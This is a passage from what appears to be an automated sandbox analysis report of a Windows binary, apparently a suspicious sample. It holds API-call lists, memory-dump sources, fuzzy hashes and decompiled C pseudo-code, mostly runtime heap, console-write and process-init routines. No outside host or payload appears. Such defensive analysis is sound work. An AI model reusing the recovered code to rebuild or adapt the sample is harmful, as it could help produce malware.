                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A8A714,?,01AE95B0), ref: 00A822D6
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,?,?,00A8A714,?,01AE95B0), ref: 00A822DE
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • strcpy.NTDLL ref: 00A822F5
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A82300
                                                                                                                                                                                                                                  • Part of subcall function 00A873E0: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00A8230F,00000000,?,?,?,00A8A714,?,01AE95B0), ref: 00A873F7
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A8A714,?,01AE95B0), ref: 00A8231D
                                                                                                                                                                                                                                  • Part of subcall function 00A815FD: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00A82329,00000000,?,?,00A8A714,?,01AE95B0), ref: 00A81607
                                                                                                                                                                                                                                  • Part of subcall function 00A815FD: _snprintf.NTDLL ref: 00A81665
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                • String ID: =
                                                                                                                                                                                                                                • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                • Opcode ID: 8d9d13848f9317266f244b8c68b0740862cc28ee0829617e7a61c5705fae6f0e
                                                                                                                                                                                                                                • Instruction ID: 419922e2deb4a53bf1ebbb16f0a7481aeacbf7daeaa52499decd6807c7da63d4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d9d13848f9317266f244b8c68b0740862cc28ee0829617e7a61c5705fae6f0e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B711A53390192577C712BBB49D99CBF3AADDE857A03090155F9059F202DE78DD035BE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DEA18(intOrPtr _a4) {
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t45 = _a4;
                                                                                                                                                                                                                                				if(_a4 != 0) {
                                                                                                                                                                                                                                					E736DE9E0(_t45, 7);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x1c, 7);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x38, 0xc);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x68, 0xc);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x98, 2);
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0xb4, 7);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0xd0, 7);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0xec, 0xc);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x11c, 0xc);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x14c, 2);
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0x154)));
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0x158)));
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                                                                                                                                                                					return E736DA293( *((intOrPtr*)(_t45 + 0x160)));
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t18;
                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DE9E0: _free.LIBCMT ref: 736DEA05
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA66
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA71
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA7C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAD0
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEADB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAE6
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAF1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
                                                                                                                                                                                                                                • Instruction ID: 189ce76c6b9c226a19bbe03b6b7b582dbdd0a5891350e311c65d0ea30a470b2a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38114F75962B04ABED65A7B1CC06FCB779C6F00B40F440C29B3DEAA1D0DA69F6144658
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A86246(intOrPtr _a4) {
                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                				unsigned int _t4;
                                                                                                                                                                                                                                				void* _t5;
                                                                                                                                                                                                                                				long _t6;
                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                				 *0xa8d2a4 = _t2;
                                                                                                                                                                                                                                				if(_t2 == 0) {
                                                                                                                                                                                                                                					return GetLastError();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t4 = GetVersion();
                                                                                                                                                                                                                                				if(_t4 != 5) {
                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                					if(_t15 <= 0) {
                                                                                                                                                                                                                                						_t5 = 0x32;
                                                                                                                                                                                                                                						return _t5;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                					 *0xa8d294 = _t4;
                                                                                                                                                                                                                                					_t6 = GetCurrentProcessId();
                                                                                                                                                                                                                                					 *0xa8d290 = _t6;
                                                                                                                                                                                                                                					 *0xa8d29c = _a4;
                                                                                                                                                                                                                                					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                                                                					 *0xa8d28c = _t7;
                                                                                                                                                                                                                                					if(_t7 == 0) {
                                                                                                                                                                                                                                						 *0xa8d28c =  *0xa8d28c | 0xffffffff;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_t4 >> 8 > 0) {
                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t15 = _t4 - _t4;
                                                                                                                                                                                                                                				goto L4;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00A84D41,?,?,00000001,?,?,?,00A85992,?), ref: 00A8624E
                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000001,?,?,?,00A85992,?), ref: 00A8625D
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00A85992,?), ref: 00A86279
                                                                                                                                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00A85992,?), ref: 00A86296
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000001,?,?,?,00A85992,?), ref: 00A862B5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 2270775618-1701360479
                                                                                                                                                                                                                                • Opcode ID: 5edf01168725c622aba66a1dbc24686e8d802675d952f56a254f51ae48d4dae4
                                                                                                                                                                                                                                • Instruction ID: 614524e6b21f90f3009d5c09ac74bbddae778b6b28c4f169f64c2ccea48f37c5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5edf01168725c622aba66a1dbc24686e8d802675d952f56a254f51ae48d4dae4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADF04F70A40301EBEB20FBA4AC1AB953B75F7057A1F104559E546DA2E0FB70C442DF25
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 67%
                                                                                                                                                                                                                                			E736DDB2B(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				char _v23;
                                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                                				void _v32;
                                                                                                                                                                                                                                				signed int _v33;
                                                                                                                                                                                                                                				long _v40;
                                                                                                                                                                                                                                				signed char _v44;
                                                                                                                                                                                                                                				char _v47;
                                                                                                                                                                                                                                				void _v48;
                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                				long _v56;
                                                                                                                                                                                                                                				char _v60;
                                                                                                                                                                                                                                				intOrPtr _v68;
                                                                                                                                                                                                                                				char _v72;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _v76;
                                                                                                                                                                                                                                				signed char _v80;
                                                                                                                                                                                                                                				signed char _v84;
                                                                                                                                                                                                                                				intOrPtr _v88;
                                                                                                                                                                                                                                				signed int _v92;
                                                                                                                                                                                                                                				char _v96;
                                                                                                                                                                                                                                				long _v100;
                                                                                                                                                                                                                                				intOrPtr _v104;
                                                                                                                                                                                                                                				intOrPtr _v108;
                                                                                                                                                                                                                                				signed char _v112;
                                                                                                                                                                                                                                				void* _v116;
                                                                                                                                                                                                                                				char _v120;
                                                                                                                                                                                                                                				int _v124;
                                                                                                                                                                                                                                				intOrPtr _v128;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _v132;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _v136;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _v140;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _v144;
                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				signed int _t172;
                                                                                                                                                                                                                                				signed int _t174;
                                                                                                                                                                                                                                				int _t178;
                                                                                                                                                                                                                                				intOrPtr _t183;
                                                                                                                                                                                                                                				intOrPtr _t186;
                                                                                                                                                                                                                                				void* _t188;
                                                                                                                                                                                                                                				void* _t190;
                                                                                                                                                                                                                                				long _t193;
                                                                                                                                                                                                                                				void _t198;
                                                                                                                                                                                                                                				long _t202;
                                                                                                                                                                                                                                				void* _t206;
                                                                                                                                                                                                                                				intOrPtr _t212;
                                                                                                                                                                                                                                				signed char* _t213;
                                                                                                                                                                                                                                				char _t216;
                                                                                                                                                                                                                                				signed int _t219;
                                                                                                                                                                                                                                				char* _t220;
                                                                                                                                                                                                                                				void* _t222;
                                                                                                                                                                                                                                				long _t228;
                                                                                                                                                                                                                                				intOrPtr _t229;
                                                                                                                                                                                                                                				char _t231;
                                                                                                                                                                                                                                				signed char _t235;
                                                                                                                                                                                                                                				signed int _t244;
                                                                                                                                                                                                                                				intOrPtr _t247;
                                                                                                                                                                                                                                				signed char _t250;
                                                                                                                                                                                                                                				signed int _t251;
                                                                                                                                                                                                                                				signed char _t253;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _t254;
                                                                                                                                                                                                                                				intOrPtr _t256;
                                                                                                                                                                                                                                				void* _t260;
                                                                                                                                                                                                                                				signed char _t261;
                                                                                                                                                                                                                                				void* _t262;
                                                                                                                                                                                                                                				void* _t264;
                                                                                                                                                                                                                                				long _t266;
                                                                                                                                                                                                                                				signed int _t269;
                                                                                                                                                                                                                                				long _t270;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _t271;
                                                                                                                                                                                                                                				signed int _t272;
                                                                                                                                                                                                                                				intOrPtr _t274;
                                                                                                                                                                                                                                				signed int _t276;
                                                                                                                                                                                                                                				signed int _t279;
                                                                                                                                                                                                                                				long _t280;
                                                                                                                                                                                                                                				long _t281;
                                                                                                                                                                                                                                				signed char _t282;
                                                                                                                                                                                                                                				intOrPtr _t283;
                                                                                                                                                                                                                                				signed int _t284;
                                                                                                                                                                                                                                				void* _t285;
                                                                                                                                                                                                                                				void* _t286;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t172 =  *0x736eb004; // 0xa11be602
                                                                                                                                                                                                                                				_v8 = _t172 ^ _t284;
                                                                                                                                                                                                                                				_t174 = _a8;
                                                                                                                                                                                                                                				_t261 = _a12;
                                                                                                                                                                                                                                				_t272 = (_t174 & 0x0000003f) * 0x38;
                                                                                                                                                                                                                                				_t244 = _t174 >> 6;
                                                                                                                                                                                                                                				_v112 = _t261;
                                                                                                                                                                                                                                				_v84 = _t244;
                                                                                                                                                                                                                                				_v80 = _t272;
                                                                                                                                                                                                                                				_t274 = _a16 + _t261;
                                                                                                                                                                                                                                				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x736ef800 + _t244 * 4)) + 0x18));
                                                                                                                                                                                                                                				_v104 = _t274;
                                                                                                                                                                                                                                				_t178 = GetConsoleCP();
                                                                                                                                                                                                                                				_t242 = 0;
                                                                                                                                                                                                                                				_v124 = _t178;
                                                                                                                                                                                                                                				E736D97DC( &_v72, _t261, 0);
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_t247 =  *((intOrPtr*)(_v68 + 8));
                                                                                                                                                                                                                                				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x736ef800 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x736eb750)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x736eb750)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E736D82C0( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E736DE75D(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E736DB595(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
                                                                                                                                                                                                                                									if(_t193 == 0) {
                                                                                                                                                                                                                                										goto L52;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
                                                                                                                                                                                                                                											L51:
                                                                                                                                                                                                                                											_v96 = GetLastError();
                                                                                                                                                                                                                                											goto L52;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t276 = _v88 - _v112 + _t266;
                                                                                                                                                                                                                                											_v92 = _t276;
                                                                                                                                                                                                                                											if(_v100 < _v56) {
                                                                                                                                                                                                                                												goto L52;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												if(_v47 != 0xa) {
                                                                                                                                                                                                                                													L38:
                                                                                                                                                                                                                                													if(_t266 >= _v104) {
                                                                                                                                                                                                                                														goto L52;
                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                														_t247 = _v128;
                                                                                                                                                                                                                                														continue;
                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                													_t198 = 0xd;
                                                                                                                                                                                                                                													_v48 = _t198;
                                                                                                                                                                                                                                													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
                                                                                                                                                                                                                                														goto L51;
                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                														if(_v100 < 1) {
                                                                                                                                                                                                                                															goto L52;
                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                															_v88 = _v88 + 1;
                                                                                                                                                                                                                                															_t276 = _t276 + 1;
                                                                                                                                                                                                                                															_v92 = _t276;
                                                                                                                                                                                                                                															goto L38;
                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L53;
                                                                                                                                                                                                                                						L23:
                                                                                                                                                                                                                                						_t250 = _v80;
                                                                                                                                                                                                                                						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
                                                                                                                                                                                                                                						__eflags = _t261 & 0x00000004;
                                                                                                                                                                                                                                						if((_t261 & 0x00000004) == 0) {
                                                                                                                                                                                                                                							_v33 =  *_t266;
                                                                                                                                                                                                                                							_t188 = E736DC8A4(_t261);
                                                                                                                                                                                                                                							_t251 = _v33 & 0x000000ff;
                                                                                                                                                                                                                                							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
                                                                                                                                                                                                                                							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
                                                                                                                                                                                                                                								_push(1);
                                                                                                                                                                                                                                								_push(_t266);
                                                                                                                                                                                                                                								goto L30;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t202 = _t266 + 1;
                                                                                                                                                                                                                                								_v56 = _t202;
                                                                                                                                                                                                                                								__eflags = _t202 - _v104;
                                                                                                                                                                                                                                								if(_t202 >= _v104) {
                                                                                                                                                                                                                                									_t261 = _v84;
                                                                                                                                                                                                                                									_t253 = _v80;
                                                                                                                                                                                                                                									_t242 = _v33;
                                                                                                                                                                                                                                									 *((char*)(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2e)) = _v33;
                                                                                                                                                                                                                                									 *(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2d) | 0x00000004;
                                                                                                                                                                                                                                									_t279 = _t276 + 1;
                                                                                                                                                                                                                                									goto L45;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t206 = E736DC771( &_v76, _t266, 2);
                                                                                                                                                                                                                                									_t286 = _t285 + 0xc;
                                                                                                                                                                                                                                									__eflags = _t206 - 0xffffffff;
                                                                                                                                                                                                                                									if(_t206 == 0xffffffff) {
                                                                                                                                                                                                                                										goto L52;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t266 = _v56;
                                                                                                                                                                                                                                										goto L31;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t261 = _t261 & 0x000000fb;
                                                                                                                                                                                                                                							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
                                                                                                                                                                                                                                							_v23 =  *_t266;
                                                                                                                                                                                                                                							_push(2);
                                                                                                                                                                                                                                							 *(_t250 + _v52 + 0x2d) = _t261;
                                                                                                                                                                                                                                							_push( &_v24);
                                                                                                                                                                                                                                							L30:
                                                                                                                                                                                                                                							_push( &_v76);
                                                                                                                                                                                                                                							_t190 = E736DC771();
                                                                                                                                                                                                                                							_t286 = _t285 + 0xc;
                                                                                                                                                                                                                                							__eflags = _t190 - 0xffffffff;
                                                                                                                                                                                                                                							if(_t190 == 0xffffffff) {
                                                                                                                                                                                                                                								goto L52;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L31;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L53;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L53:
                                                                                                                                                                                                                                				if(__eflags != 0) {
                                                                                                                                                                                                                                					_t183 = _v72;
                                                                                                                                                                                                                                					_t167 = _t183 + 0x350;
                                                                                                                                                                                                                                					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
                                                                                                                                                                                                                                					__eflags =  *_t167;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				__eflags = _v8 ^ _t284;
                                                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                                                				return E736D6EA3(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
                                                                                                                                                                                                                                			}
                                                                                                                                                                                                                                0x736ddb7b
                                                                                                                                                                                                                                0x736ddb82
                                                                                                                                                                                                                                0x736ddb8f
                                                                                                                                                                                                                                0x736ddb90
                                                                                                                                                                                                                                0x736ddb93
                                                                                                                                                                                                                                0x736ddb96
                                                                                                                                                                                                                                0x736ddb97
                                                                                                                                                                                                                                0x736ddb98
                                                                                                                                                                                                                                0x736ddb9b
                                                                                                                                                                                                                                0x736ddba0
                                                                                                                                                                                                                                0x736ddeac
                                                                                                                                                                                                                                0x736ddeac
                                                                                                                                                                                                                                0x736ddba6
                                                                                                                                                                                                                                0x736ddba6
                                                                                                                                                                                                                                0x736ddba9
                                                                                                                                                                                                                                0x736ddbab
                                                                                                                                                                                                                                0x736ddbb1
                                                                                                                                                                                                                                0x736ddbb4
                                                                                                                                                                                                                                0x736ddbbb
                                                                                                                                                                                                                                0x736ddbc2
                                                                                                                                                                                                                                0x736ddbcb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddbd1
                                                                                                                                                                                                                                0x736ddbd7
                                                                                                                                                                                                                                0x736ddbd9
                                                                                                                                                                                                                                0x736ddbdb
                                                                                                                                                                                                                                0x736ddbde
                                                                                                                                                                                                                                0x736ddbe3
                                                                                                                                                                                                                                0x736ddbe7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddbe7
                                                                                                                                                                                                                                0x736ddbec
                                                                                                                                                                                                                                0x736ddbef
                                                                                                                                                                                                                                0x736ddbf1
                                                                                                                                                                                                                                0x736ddbf6
                                                                                                                                                                                                                                0x736ddca8
                                                                                                                                                                                                                                0x736ddca9
                                                                                                                                                                                                                                0x736ddcac
                                                                                                                                                                                                                                0x736ddcae
                                                                                                                                                                                                                                0x736dde5c
                                                                                                                                                                                                                                0x736dde5e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde60
                                                                                                                                                                                                                                0x736dde60
                                                                                                                                                                                                                                0x736dde63
                                                                                                                                                                                                                                0x736dde66
                                                                                                                                                                                                                                0x736dde6f
                                                                                                                                                                                                                                0x736dde72
                                                                                                                                                                                                                                0x736dde73
                                                                                                                                                                                                                                0x736dde77
                                                                                                                                                                                                                                0x736dde7a
                                                                                                                                                                                                                                0x736dde7a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde7e
                                                                                                                                                                                                                                0x736ddcb4
                                                                                                                                                                                                                                0x736ddcb4
                                                                                                                                                                                                                                0x736ddcb9
                                                                                                                                                                                                                                0x736ddcbc
                                                                                                                                                                                                                                0x736ddcc2
                                                                                                                                                                                                                                0x736ddcc8
                                                                                                                                                                                                                                0x736ddcd1
                                                                                                                                                                                                                                0x736ddcd4
                                                                                                                                                                                                                                0x736ddcd4
                                                                                                                                                                                                                                0x736ddcd5
                                                                                                                                                                                                                                0x736ddcd6
